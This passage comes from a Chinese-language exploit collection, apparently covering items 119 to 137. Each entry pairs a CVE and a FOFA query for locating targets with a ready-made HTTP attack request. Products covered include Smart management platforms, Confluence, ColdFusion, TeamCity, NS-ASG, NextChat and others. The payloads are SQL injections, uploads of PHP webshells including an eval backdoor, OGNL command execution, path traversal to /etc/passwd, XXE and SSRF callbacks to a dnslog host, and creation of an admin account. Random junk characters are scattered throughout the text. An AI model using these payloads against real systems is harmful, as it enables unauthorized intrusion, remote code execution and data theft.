0 ~, ~0 L+ K) g% B) o0 V# n, S4 z-----------------------------13979701222747646634037182887--
$ m" @3 f, d  ]6 I" R' }0 Q/ H( t+ @) H0 A1 _% O4 s" |( \" T- K
9 q& e, V" x3 q& T! y; K$ r' m
访问/home/src.php
2 N' u( ^/ B7 E7 X5 c
" y! _3 e* a& ]. R7 e" q119. 北京百绰智能S20后台sysmanageajax.php sql注入" [& j/ Y6 a$ \- h7 b3 @, m
CVE-2024-1254
4 [2 s; F7 }$ i& A: [FOFA:title="Smart管理平台"0 C+ q' u' ]' w! q/ v
先登录进入系统,默认账号密码为admin/admin
3 i! n) v, Y+ z# [- c& e+ \2 I! ePOST /sysmanage/sysmanageajax.php HTTP/1.11
2 D3 ?5 C, j" q* U' L" A2 ^. WHost: x.x.x.x
; b; o: }1 @$ M$ Y0 [Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
( J% g6 V2 p9 U; J4 w# @4 B* G3 p: \# cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.03 d, y' M7 w7 Z0 \9 l" C6 L
Accept: */*
& x3 t) [6 M3 h2 \# X4 oAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 R, J6 r2 I" K, ^
Accept-Encoding: gzip, deflate! y# E6 P, c) O) q% M' o  ?) E+ P$ z& K
Content-Type: application/x-www-form-urlencoded;
9 F, p0 l) z8 j8 s  uContent-Length: 109# u) b- K8 s5 Y
Origin: https://58.18.133.60:8443
6 W1 Y9 Z4 b. ]% O6 M1 i$ RReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php: Z3 J$ \+ c& \: U; |* }+ O+ L
Sec-Fetch-Dest: empty
4 \2 V( z& F- h8 F8 g: s: @+ KSec-Fetch-Mode: cors8 i# z, e) }, V9 M
Sec-Fetch-Site: same-origin
" h) n% p2 t1 v  O1 [" HX-Forwarded-For: 1.1.1.1: J# ?* c" ]5 Z! h4 @
X-Originating-Ip: 1.1.1.1
* }) z8 `1 E8 ?8 a% O% jX-Remote-Ip: 1.1.1.1
$ A# }1 A" x/ l. ~X-Remote-Addr: 1.1.1.1
: I7 q; ?( Q  `& F8 JTe: trailers  t( v. a8 X5 |/ v; N
Connection: close0 H* u0 \" `/ [8 ]

- X3 u( e3 h4 G- a  J: S% D  Y$ \src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
" z7 s0 c+ ]6 B8 r( y+ M4 x! f6 T  S" u& f1 r

2 V9 t" H' f, b9 Y# D& s. E% @. r120. 北京百绰智能S40管理平台导入web.php任意文件上传) \* C0 g1 B( q
CVE-2024-1253
2 ~3 P$ y, j# S* ^FOFA:title="Smart管理平台"
9 e. N6 [# h; V! MPOST /useratte/web.php? HTTP/1.1
  w& W" j$ n! c2 a" S" ~Host: ip:port
2 `' R! e+ D& B$ \: a+ GCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
9 Q$ G/ D# k0 j. y. _User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko+ x% g# Z' h+ R! D2 e0 K' |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8$ h7 s# T) z' y/ l; W/ b
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" s2 [6 O  T- A+ L+ ?: U
Accept-Encoding: gzip, deflate
! Q. D  H) l# L! r9 e7 P. N% zContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
1 ~& V2 Y# u5 V& E7 y1 fContent-Length: 597' Y" s- e' Y7 L* _4 O- s: q4 K
Origin: https://ip:port
+ k( |5 N' i" [* D3 w0 XReferer: https://ip:port/sysmanage/licence.php
4 v% ^* d) F& N" mUpgrade-Insecure-Requests: 1& C! d  i8 ]* T
Sec-Fetch-Dest: document
0 ?& ?  F  v  H, RSec-Fetch-Mode: navigate6 x4 R! K" Q& T% `3 Y7 \+ K, O
Sec-Fetch-Site: same-origin6 ]3 ]% I4 a$ A3 E
Sec-Fetch-User: ?1( N9 V. l3 E0 T
Te: trailers# e7 {4 E8 ^- a( x# ]  y& K2 ^
Connection: close
5 E/ m9 k4 c( a9 U2 i* k/ L7 ]; n1 N  R; y; w% p) n) C
-----------------------------423289041236658752706300793287 P' S! j/ N3 G+ _/ Z
Content-Disposition: form-data; name="file_upload"; filename="2.php": ?" H9 B, K  `  r8 Y, {
Content-Type: application/octet-stream
# O+ k: Y& f" s' k/ w: F
) B# B. w, g! p& z<?php phpinfo()?>
9 Q% P+ M9 u  u1 R-----------------------------42328904123665875270630079328) h1 D) x, M2 W) M0 W/ p! O
Content-Disposition: form-data; name="id_type"
# z' X. |9 J1 ?; ^/ _' w) M8 S/ N7 j/ |9 D
1! \* b- n% d" Y' W. ]4 G) O+ }
-----------------------------42328904123665875270630079328
" B/ m  z5 q& Q+ ^Content-Disposition: form-data; name="1_ck"
* G, Z, L  \, V% P) {/ m( v8 h: [6 G5 V% }! u( D4 D( ~6 Z) d; J
1_radhttp
: Y8 @$ D4 I( a8 J7 V3 d5 j+ |-----------------------------42328904123665875270630079328/ n- q! x' i, Y
Content-Disposition: form-data; name="mode": l8 w- c) V8 Y. A5 g( k
) ]- {; k' N% ^( Y! o. L
import' d- @" g4 L: m
-----------------------------42328904123665875270630079328' r- Q4 o: N5 b# U

- }: Y6 b+ e% D2 u1 S; f* c9 ^) G+ g, b# ~- p- @0 x
文件路径/upload/2.php
1 F3 b4 z: H: y0 I1 c- S$ z. ~! D% q6 X" W1 a1 }: j
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
3 Z4 P' x7 Z- q4 MCVE-2024-19184 ~: v1 i6 j5 k- ?& E/ K
FOFA:title="Smart管理平台"
8 w% P- n2 {% w8 vPOST /useratte/userattestation.php HTTP/1.1( b" r: {: _5 S1 s9 m  K
Host: 192.168.40.130:84430 J$ u2 I2 d, n  a4 b3 v
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50' y5 e; x: d; M3 C$ K4 w' \
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko) l9 g/ L, E: d# |) X% ~* q- a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* r5 }. m, M5 v' YAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  ]4 _* I4 q6 h, y& u
Accept-Encoding: gzip, deflate% N' y, Q" A( s4 d- X& O
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328: P5 z( ]# O6 A7 L( g
Content-Length: 592
9 [3 `& E7 J& g% S% {* t7 [" EOrigin: https://192.168.40.130:84437 X! i4 `8 y* H- I0 L  ?- Z* h/ J
Upgrade-Insecure-Requests: 14 ]) p9 l0 X7 j3 X  o, [8 r: {3 g1 Q( z/ F
Sec-Fetch-Dest: document9 ^2 I4 K# E3 T# K7 ~# i+ {
Sec-Fetch-Mode: navigate
8 C+ j4 i/ ?5 _Sec-Fetch-Site: same-origin) \  b: _' C. c0 S! e6 m
Sec-Fetch-User: ?12 R* C. e+ _3 z
Te: trailers! t2 _2 P7 Q; }/ _$ \
Connection: close
9 w0 H" Q4 k* ]* Z4 \9 X
; c# |3 k3 c/ \8 Z8 u-----------------------------42328904123665875270630079328
  W; Z! [- e3 O8 X1 r7 K* U2 z, b: ZContent-Disposition: form-data; name="web_img"; filename="1.php"
$ q2 Q# W0 }3 C6 Y, h4 `: S- ~Content-Type: application/octet-stream
1 `0 E5 C4 K& |. t1 p/ B
3 u3 h  r- _7 S6 Q9 J. R4 Z<?php phpinfo();?>
0 m# I3 S% A$ c; W+ |- q-----------------------------423289041236658752706300793283 F3 M6 i2 A8 i! E
Content-Disposition: form-data; name="id_type"4 o% C( {: ~, d2 C( g

" _$ S! |- g) ]& N7 q: y5 G: a! v1
% l' |5 `6 I1 o2 R. I. v4 [5 L-----------------------------42328904123665875270630079328
& ~+ [: X6 b, U2 IContent-Disposition: form-data; name="1_ck"
  P# p2 D; i$ u4 q
' W1 t+ r; e5 M$ o! y/ g1_radhttp
, Q( m* {" G8 o4 I+ P3 t-----------------------------42328904123665875270630079328
& T3 q9 X+ l- M( R3 x8 B+ TContent-Disposition: form-data; name="hidwel"7 v: y2 C+ a0 h

# h3 ~: g5 {4 h% _4 Zset
) J- s& t- G+ r* L2 a-----------------------------42328904123665875270630079328
# v9 f% a' f  Q! p# Q
& f' D8 Z$ {, N* [0 d& ~
; A" l8 o0 L2 a+ V* k; Pboot/web/upload/weblogo/1.php
( i/ q7 R) ~& ^& Z# n
9 }! F2 t+ T; k; J4 O4 F: k122. 北京百绰智能s200管理平台/importexport.php sql注入0 U0 j4 E+ J, \& N+ d
CVE-2024-27718FOFA:title="Smart管理平台". M6 n- J( d" W3 T
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
: x$ o' y* M& y0 d8 `8 TGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
3 Z  }3 B" _6 d  G  p8 BHost: x.x.x.x
2 ]6 Y5 _; D1 F4 P7 ^. l9 y" S% }Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
' h: [/ p' g, Y2 e" TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0( D: m/ O8 p4 p1 I' e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& x  l% p4 k. y% _0 Q  KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 G% Y5 |" }1 p4 @Accept-Encoding: gzip, deflate, br
0 k0 J. l# a1 d/ A/ _Upgrade-Insecure-Requests: 1
, ]) s. t/ k; c, k7 |& p% uSec-Fetch-Dest: document
4 r2 w  L. Q$ YSec-Fetch-Mode: navigate) L: Z# j4 I' U# h  H* L
Sec-Fetch-Site: none" ~4 ]( S' y) |
Sec-Fetch-User: ?1
# U; a% m% `. K- {7 y+ r3 TTe: trailers
- y& V& u# ~' M) X7 rConnection: close) J1 j3 n( b# c0 |6 F

. p" x  I0 d$ Y6 [5 \# J
4 D1 m: T% r# ]4 g- b! x123. Atlassian Confluence 模板注入代码执行) o% P' ]/ N9 V& R' C$ {: l2 o" _
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
, O* ~' a+ S6 Q4 ^% N  TPOST /template/aui/text-inline.vm HTTP/1.1
" z4 d; Y; ^1 J7 R$ u! BHost: localhost:8090* J: @0 P! D+ Q
Accept-Encoding: gzip, deflate, br$ N, _9 u$ c( X$ M0 T
Accept: */*' o6 r& l& R; w$ B3 S! e5 s
Accept-Language: en-US;q=0.9,en;q=0.8% r/ E% r' j! r, E, K1 N+ M- B0 N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36# A* O' u: |( Q1 _$ W" ^
Connection: close# E: h  U, L$ Z1 n, Y8 k4 z
Content-Type: application/x-www-form-urlencoded# P. s; E/ H0 o, x) m& e

( p3 v( I' g2 q0 A, {; S8 y% P! P9 J( {label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
. s. j8 O$ `" A3 o7 q
/ m- d/ z! U# u* y: g
( [. j+ e- j' ?8 z# E7 x+ J" v124. 湖南建研工程质量检测系统任意文件上传
5 M$ l# g2 \2 S& w+ ^) KFOFA:body="/Content/Theme/Standard/webSite/login.css"
7 L7 d; @8 A( hPOST /Scripts/admintool?type=updatefile HTTP/1.1) D& a2 @% P- j: i0 {! K
Host: 192.168.40.130:8282
" D- `3 o$ V8 z% O; fUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.365 N; z$ Z* ]2 K2 R! a1 c
Content-Length: 72) W) O/ g2 D. ?$ u* Z$ Y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
/ t+ R+ O5 Z' A$ |Accept-Encoding: gzip, deflate, br- j' f! C" |- O8 a( A
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 E9 D6 _, c# zConnection: close
8 U& Z' u' |3 p7 o$ IContent-Type: application/x-www-form-urlencoded- [' @0 q: b- L+ k9 }' Y
5 `, v! M. H8 Y; z' @6 R
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
, d: h# c  _" E5 Y# ]7 V* }. f0 B+ R& c) H

5 t/ j$ |2 E' b# Yhttp://192.168.40.130:8282/Scripts/abcgcg.aspx1 H' m& D( W4 x4 s9 S
1 l  L' B* B/ ?7 k- n
125. ConnectWise ScreenConnect身份验证绕过+ o; a* l9 d9 y
CVE-2024-1709
6 x% H, |6 ^/ k- E$ P: UFOFA:icon_hash="-82958153"6 q, C* q& u/ Q9 b5 ?) f* E
https://github.com/watchtowrlabs ... bypass-add-user-poc
  _7 O# _- l* F" d# @
- y& [2 e7 s* `2 c+ W3 G, R8 u- Y3 Y0 e! [  g7 a
使用方法
7 \( |1 H! V; \9 G; _, ?' W. V- Hpython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
* c% h. ~! v# i
% j7 z, \1 M6 j! N- k+ b2 @
" W% U& s5 N. e" y+ {+ r; J创建好用户后直接登录后台,可以执行系统命令。7 [! `  o: O: ?, J9 G9 E

2 y. O' L8 `" M( G. Q( ]$ d; m126. Aiohttp 路径遍历
" f. u7 t$ ]0 p$ gFOFA:title=="ComfyUI"
: v9 {3 ?" p, Q; Q/ n! [GET /static/../../../../../etc/passwd HTTP/1.1& g4 t( \9 o2 C- h4 Z4 m
Host: x.x.x.x
. A  l' z: \$ Y1 ^) q1 w/ ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.369 ^  i" d5 Z  q1 l. m7 `9 f5 M
Connection: close
+ p0 @" N; W0 @6 m8 J3 s6 eAccept: */*
- D( W2 f2 ^8 A& [9 bAccept-Language: en
2 H+ M# r! ^$ Q  M5 CAccept-Encoding: gzip+ |1 Z$ c/ b6 I9 a1 M
  s8 o. B$ h# P5 ]: U, u
. W- O+ v- N7 j
127. 广联达Linkworks DataExchange.ashx XXE7 K& N6 \/ t$ p  x2 C
FOFA:body="Services/Identification/login.ashx"
3 m+ i) t  Y# GPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1' C1 ], R# x% m3 V/ o6 O
Host: 192.168.40.130:8888
; D) Z% N& q+ bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
. H% Z6 X" |6 h& n% uContent-Length: 415
3 W5 r) X/ B  B% c4 m0 _0 RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) ]- {( t" ?! f9 m/ }- v
Accept-Encoding: gzip, deflate
# h3 K( N% w6 o( }Accept-Language: zh-CN,zh;q=0.9( ^+ r+ h6 n% S; t7 V, U
Connection: close9 A! z6 L8 X, Z2 j( |9 W
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
: X9 W- F8 }2 h% [; l+ `Purpose: prefetch* F% ]. ~, I9 V
Sec-Purpose: prefetch;prerender4 A( M4 ]1 L$ K4 V

5 L, E& S" U  ?# o3 c6 E$ w, M2 }------WebKitFormBoundaryJGgV5l5ta05yAIe0
- K8 j& C, {( C8 X" O  l) cContent-Disposition: form-data;name="SystemName"
7 x& A1 [1 t; F) Y6 Z  N& P5 ^
  K; ^$ i4 b( u" Q( lBIM5 X5 {: C0 @$ w
------WebKitFormBoundaryJGgV5l5ta05yAIe0
* p& S$ K6 D9 iContent-Disposition: form-data;name="Params"
$ d# `, }4 t. Z9 j( G! N# B4 A% nContent-Type: text/plain
3 ^3 Y! J% y/ r) f9 D- B2 O+ k
9 k5 }. W& o8 B) k( v  H  g<?xml version="1.0" encoding="UTF-8"?>
% v* u- V- ?' i: g; S<!DOCTYPE test [
; l7 Q/ ~9 Z7 T5 ~  W5 L- g<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
$ P3 ~4 |" z( v: n  [6 W7 K]
1 X; ^( j. o; G>4 J* T" L1 w% T; P6 \! s9 j
<test>&t;</test>
2 i) N* e/ i$ w------WebKitFormBoundaryJGgV5l5ta05yAIe0--7 }( C7 W2 @6 T0 l/ @) d7 P2 k/ h
$ y' c- c8 a& m+ C" d
) u6 y. o7 F$ i/ P
  _! z- }& f, q, C
128. Adobe ColdFusion 反序列化
7 x, i" Y& _& p1 l3 B& u! TCVE-2023-38203: I" h7 a$ E4 ?. _( O# s5 z# V
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本); n& ^6 E# Z2 L
FOFA:app="Adobe-ColdFusion"4 c; _  S) D4 b; F
PAYLOAD+ o, D$ H% E; \% n1 O  b
3 `8 M5 D0 c/ U' C8 x/ x
129. Adobe ColdFusion 任意文件读取
" V3 c# [5 I+ R8 t2 DCVE-2024-20767) L; S2 p$ O) t, t! u' v3 `
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"4 d# o, M0 v$ J' V
第一步,获取uuid
$ H: m8 m! P0 V, k- O/ zGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1% M7 K4 u8 K+ H. E- W+ X. g9 h
Host: x.x.x.x! S. y( @/ g8 h* i7 n; N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
* `# Y/ U5 V& @: p2 tAccept: */*
6 u2 v! |  g. s+ a" |( bAccept-Encoding: gzip, deflate, E  B3 J$ r- f3 o
Connection: close' n  W$ y5 N$ i+ ^( l* n
3 Z5 r9 h# Y" V* T& G/ X8 e

# e/ p7 f1 y  b: q# d+ ~6 G. P. T& K5 b第二步,读取/etc/passwd文件
+ i. N( I7 ?; g/ N* vGET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1$ Y1 Q2 v0 R) I% o/ }7 `' x
Host: x.x.x.x( T" B* o$ ^/ g7 N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36# n2 S/ G1 H$ |
Accept: */*7 [9 C& G+ m) h% Q! g- X
Accept-Encoding: gzip, deflate
. I& @6 Y0 J6 ?  fConnection: close
( V; T2 ^- B4 k: d0 p4 }% D9 ouuid: 85f60018-a654-4410-a783-f81cbd5000b9# k9 @0 v. {8 @  m
+ @7 T* Z$ L  H. L: m
2 V& F- `2 K4 b5 x6 h
130. Laykefu客服系统任意文件上传
. v# N9 o' J& e' J+ ^7 tFOFA:icon_hash="-334624619"
# U: ]; A# a1 ]1 j6 vPOST /admin/users/upavatar.html HTTP/1.1% y" a" R" ?; \+ Z7 `' Z9 H
Host: 127.0.0.15 y  c) G9 t* B& ~
Accept: application/json, text/javascript, */*; q=0.015 m$ C( X, O0 y' t- \% j9 W
X-Requested-With: XMLHttpRequest4 W7 e+ U/ Q' o$ S$ n- J
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26( Z" J1 m- [' n
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR4 H5 r  p- M8 ?/ p# ^
Accept-Encoding: gzip, deflate
$ O! u5 X3 M, Y7 U6 k6 QAccept-Language: zh-CN,zh;q=0.9# b  Y0 ]! |) r( I
Cookie: user_name=1; user_id=3
# U( {1 {5 j$ q  `Connection: close( N+ I7 U# z8 @6 E5 z
; g8 a' U! R" A" `/ }  n
------WebKitFormBoundary3OCVBiwBVsNuB2kR  z$ O1 M$ R5 v: ?
Content-Disposition: form-data; name="file"; filename="1.php"; E' o/ U; s5 Z; W# k
Content-Type: image/png
( x; s# E* g5 {& R5 g* x + V) R- `- m6 k& q
<?php phpinfo();@eval($_POST['sec']);?>' {/ }+ g5 @% L% j
------WebKitFormBoundary3OCVBiwBVsNuB2kR--
. ?5 S: Z, h. l9 \4 T9 K- Z
% e/ p! q1 \* m: k
0 ]7 U# [, ?* z131. Mini-Tmall <=20231017 SQL注入
* ]- x" X% J- w  aFOFA:icon_hash="-2087517259"
* X  t) c/ I& r) ^& }6 U) X9 |" x# z后台地址:http://localhost:8080/tmall/admin; u# z0 |9 z) t6 U
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)4 ^5 `! `( v8 i

, H5 S2 a% U% g) C! @3 q2 q0 D6 H2 J% k132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过/ S% `0 D9 S0 g+ }5 _2 k
CVE-2024-27198
& x, {9 o& z5 B- f4 C) Y* xFOFA:body="Log in to TeamCity"0 W# w6 Z: {. {  U/ F2 T5 A& w6 ?
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1) T! l0 y. D+ w  L3 R0 v" N8 p3 M
Host: 192.168.40.130:8111
8 b5 ~7 j$ N1 O! F6 N8 O0 W, ]* p4 nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36. K* v$ Z$ l$ y, T* p3 h
Accept: */*
% P8 K+ A0 G& ^9 v; L! AContent-Type: application/json
2 E. L, D5 M$ {, N0 j: P" CAccept-Encoding: gzip, deflate( e/ M  j2 W5 \9 S7 ?. \
& [9 v0 m9 @1 @7 u2 s( s2 I, E, O
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
% }- U/ s( B$ {2 \6 }/ N  o$ ]8 `/ H& a; M
0 a/ P7 X$ e" @
CVE-2024-271997 u  |, d7 d( R& W( U5 e4 u1 h/ G
/res/../admin/diagnostic.jsp9 d" |4 ]3 d  m
/.well-known/acme-challenge/../../admin/diagnostic.jsp
5 k( J: r5 v" C4 E/update/../admin/diagnostic.jsp
6 C7 {! D6 Z: _6 I: U( Z+ Z1 `2 C& y# h3 }0 @  e, s
8 v# V' _0 `1 Q  K
CVE-2024-27198-RCE.py( S6 W$ y% g+ ^5 J/ F1 X

0 i& a' o9 C! U$ D+ _9 s2 u. h133. H5 云商城 file.php 文件上传* U3 i9 I6 Y2 a6 j; J7 x
FOFA:body="/public/qbsp.php"5 c; D/ p& E$ X6 w3 e/ I
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
9 }  E; P, X+ }Host: your-ip9 e% @! Y' A, x0 T2 Y1 s
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
/ w5 C$ v/ c# b! d4 `0 y+ e- YContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
# n0 k/ m% \/ t  L  Q  e: L, f4 Y! W9 N
------WebKitFormBoundaryFQqYtrIWb8iBxUCx
" W( F3 h$ r  Q! m4 R( z; |Content-Disposition: form-data; name="file"; filename="rce.php"2 Y. z" Z/ h- x$ I* f$ [9 p6 g
Content-Type: application/octet-stream9 t  u( @. p% b: N, M, |
$ ?: A( J4 B( D* D7 Q% l1 m! p- [5 d
<?php system("cat /etc/passwd");unlink(__FILE__);?>
0 K8 S' T, u, r$ i' H------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
4 ^- M0 s: F/ r7 S
3 u; X" E0 G8 V1 O+ |  l  @
  M) `  ?- r. V6 F6 _& X$ k0 e- X6 D2 E4 d
134. 网康NS-ASG应用安全网关index.php sql注入
: t0 m* Q* [% o- P# j4 t) @CVE-2024-2330
4 h  z  u7 R% bNetentsec NS-ASG Application Security Gateway 6.3版本4 l9 B& j2 ~; W# ?4 e6 `
FOFA:app="网康科技-NS-ASG安全网关"/ n# c/ }% C5 c1 l* ~  ]
POST /protocol/index.php HTTP/1.1) j$ J! \5 D' L6 w1 s8 y: Y
Host: x.x.x.x
! Q1 \2 `( v2 Z( KCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
4 b& z4 o, W8 W5 M( ^  f0 [) t- }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
& w. U" W+ u' nAccept: */*
4 ~& D+ y5 H6 A9 N+ p2 @+ ?Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 F/ J. ~) k  p; m4 \8 R
Accept-Encoding: gzip, deflate+ c$ f# b! {* @* q- u# B
Sec-Fetch-Dest: empty
3 e/ f4 V. s5 M9 ^* h. a# KSec-Fetch-Mode: cors
7 y2 L" S' I8 VSec-Fetch-Site: same-origin
: u$ G" B+ {8 @3 e% N. yTe: trailers
8 C8 d; M1 M. Y# J, T: V/ zConnection: close
0 Z% t" _8 E9 `, _; IContent-Type: application/x-www-form-urlencoded/ B+ H9 N( N5 u9 O$ ?
Content-Length: 263
% T4 T+ C. E+ |* U* l
. z9 p& }* x$ N# [jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}) v" F; \6 ?. ]' A/ A. M
) L  I* ?& u! t4 E' J0 V9 q

' g$ _# u# U4 w3 p. f# B4 h135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入# I" K" \  s2 a* I4 U
CVE-2024-2022  V8 m, p( @- ^3 ]$ G8 I
Netentsec NS-ASG Application Security Gateway 6.3版本4 h6 a; R* w5 q; k; f# y
FOFA:app="网康科技-NS-ASG安全网关"
8 k1 b" N4 F/ k% UGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
1 D4 q0 S( p. a2 I4 T, CHost: x.x.x.x( s) \2 E/ l& H+ q" z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
, U/ m. i& m. U8 b7 ]: n1 H% VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 ?: M, Y. p: [) d- w. LAccept-Encoding: gzip, deflate- w" I) z" H1 J: s2 V, B
Accept-Language: zh-CN,zh;q=0.9
8 `8 U, D; q# L# n' p, HConnection: close; w1 d: K8 L; |0 b

5 i& H  M6 p7 o2 D+ j0 e
/ g( o: K  `7 U: O8 S136. NextChat cors SSRF
6 D* A7 i1 L4 y' oCVE-2023-49785
2 C* ^; @4 u( f) eFOFA:title="NextChat"3 V- m" f, b7 u) l
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1+ \' b# Y1 ^  C1 x' o
Host: x.x.x.x:10000( X1 o1 P9 A) A( \7 t$ i3 u( V
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
7 q- x+ c0 y* k; V# GConnection: close
# e0 _" L: K# t, e) ]2 }7 yAccept: */*+ G2 F- Q6 M6 t3 t! X
Accept-Language: en3 P0 o9 q# n3 M$ |
Accept-Encoding: gzip9 w: V) [0 x% R5 u4 {

7 i! y1 k) S5 Y) C# r
& |" X! v! m- _$ \& X137. 福建科立迅通信指挥调度平台down_file.php sql注入, T$ u0 r4 r6 h# |) i/ L; u
CVE-2024-2620, `6 b- t, Y5 V1 P
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
6 K; P, V) O) MGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.17 g1 q! W7 E1 v$ g0 K9 O4 s( ?  Q
Host: x.x.x.x! Q; o. S( i( a* M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.03 J( c9 D) Y1 x4 `+ m: p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; Y& m/ H2 \& C, k
